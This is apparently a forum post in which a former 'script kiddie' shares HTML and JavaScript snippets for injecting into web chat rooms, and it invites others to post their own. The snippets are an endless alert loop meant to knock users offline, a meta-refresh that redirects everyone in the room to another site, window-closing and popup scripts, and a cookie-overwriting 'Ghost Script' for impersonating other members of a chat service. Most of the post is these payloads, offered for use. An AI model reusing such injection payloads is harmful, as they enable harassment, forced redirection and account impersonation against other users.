Back when I a little scripter kiddie. I made little java/html scripts to mess with people in html based chat rooms. Here are some of the scripts that I made.....


Punt Script:
Code:
<script language=javascript>var i=0; 
while( i < (i +2)){i +=1; alert ('Enter text here' +i) }</script>
This script punts a person offline...


Transport Script:
Code:
<meta http-equiv="refresh" 
content=1;url="URL here"></meta>
This script sends a the people in the chat room to an other web site...


Wondow Script:
Code:
<script>window.close("")</script>
This script will close the window that your in...


Alert Script:
Code:
<script>window.alert("Message here")</script>
This script will make a popup alert prompt...


Ghost Script:
Code:
<script>document.cookie="LAI=666";document.
cookie="username="+prompt('username');ALERT('
OKAY')</SCRIPT>
This script I did not make... It was made for theglobe.com private rooms... It's a real cool code the will change you into any other globe member.... This script is one of the meny reasons why theglobe.com shut down......


If you made any cool javascript or html scripts back when you were a scripter kiddie feel free to post them on this thread....


System_0verload